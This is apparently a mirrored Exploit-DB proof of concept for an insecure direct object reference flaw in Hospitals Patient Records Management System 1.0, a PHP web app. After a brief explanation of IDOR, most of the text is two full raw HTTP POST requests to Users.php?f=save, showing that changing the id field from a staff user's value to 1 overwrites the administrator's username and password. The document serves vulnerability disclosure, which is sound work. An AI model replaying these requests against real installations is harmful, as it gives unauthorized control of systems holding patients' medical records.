Hospitals Patient Records Management System 1.0 – Account TakeOver

• Exploit Database
• 115 阅读

• 作者： twseptian
  日期： 2022-01-05
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50631/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123

  # Exploit Title: Hospitals Patient Records Management System 1.0 - Account TakeOver # Date: 30/12/2021 # Exploit Author: twseptian # Vendor Homepage: https://www.sourcecodester.com/php/15116/hospitals-patient-records-management-system-php-free-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/hprms_0.zip # Version: v1.0 # Tested on: Kali Linux 2021.4   *Insecure direct object references (IDOR)* Insecure Direct Object References (IDOR) occur when an application provides direct access to objects based on user-supplied input.Insecure Direct Object References allow attackers to bypass authorization and access resources directly by modifying the value of a parameter used to directly point to an object. Such resources can be database entries belonging to other users, files in the system.   *Attack Vector* An attacker can takeover the Administrator's account   *Steps of reproduce:* Note: in this case, we used two users, user1 as a staff with user id '4', and admin as an Administrator with user id '1'.   =====================================================================================================================================   Step-1: Log in to the application using user1 account,then on the dashboard navigate to 'My Account'   http://localhost/hprms/admin/?page=user   =====================================================================================================================================   Step-2: Modify the username,lastname and password,then let's intercept the request using burpsuite:   POST /hprms/classes/Users.php?f=save HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------17632878732301879013646251239 Content-Length: 806 Origin: http://localhost Connection: close Referer: http://localhost/hprms/admin/?page=user Cookie: PHPSESSID=32kl57ct3p8nsicsrp8dte2c50 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin   -----------------------------17632878732301879013646251239 Content-Disposition: form-data; name="id"   4 -----------------------------17632878732301879013646251239 Content-Disposition: form-data; name="firstname"   user1 -----------------------------17632878732301879013646251239 Content-Disposition: form-data; name="lastname"   admin -----------------------------17632878732301879013646251239 Content-Disposition: form-data; name="username"   admin1 -----------------------------17632878732301879013646251239 Content-Disposition: form-data; name="password"   admin1 -----------------------------17632878732301879013646251239 Content-Disposition: form-data; name="img"; filename="" Content-Type: application/octet-stream     -----------------------------17632878732301879013646251239--   =====================================================================================================================================   Step-3: Change parameter id '4' to id '1'   POST /hprms/classes/Users.php?f=save HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------17632878732301879013646251239 Content-Length: 806 Origin: http://localhost Connection: close Referer: http://localhost/hprms/admin/?page=user Cookie: PHPSESSID=32kl57ct3p8nsicsrp8dte2c50 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin   -----------------------------17632878732301879013646251239 Content-Disposition: form-data; name="id"   1 -----------------------------17632878732301879013646251239 Content-Disposition: form-data; name="firstname"   user1 -----------------------------17632878732301879013646251239 Content-Disposition: form-data; name="lastname"   admin -----------------------------17632878732301879013646251239 Content-Disposition: form-data; name="username"   admin1 -----------------------------17632878732301879013646251239 Content-Disposition: form-data; name="password"   admin1 -----------------------------17632878732301879013646251239 Content-Disposition: form-data; name="img"; filename="" Content-Type: application/octet-stream     -----------------------------17632878732301879013646251239--   =====================================================================================================================================   step-4: Click 'Forward' on burpsuite. Now user1 is a Administrator.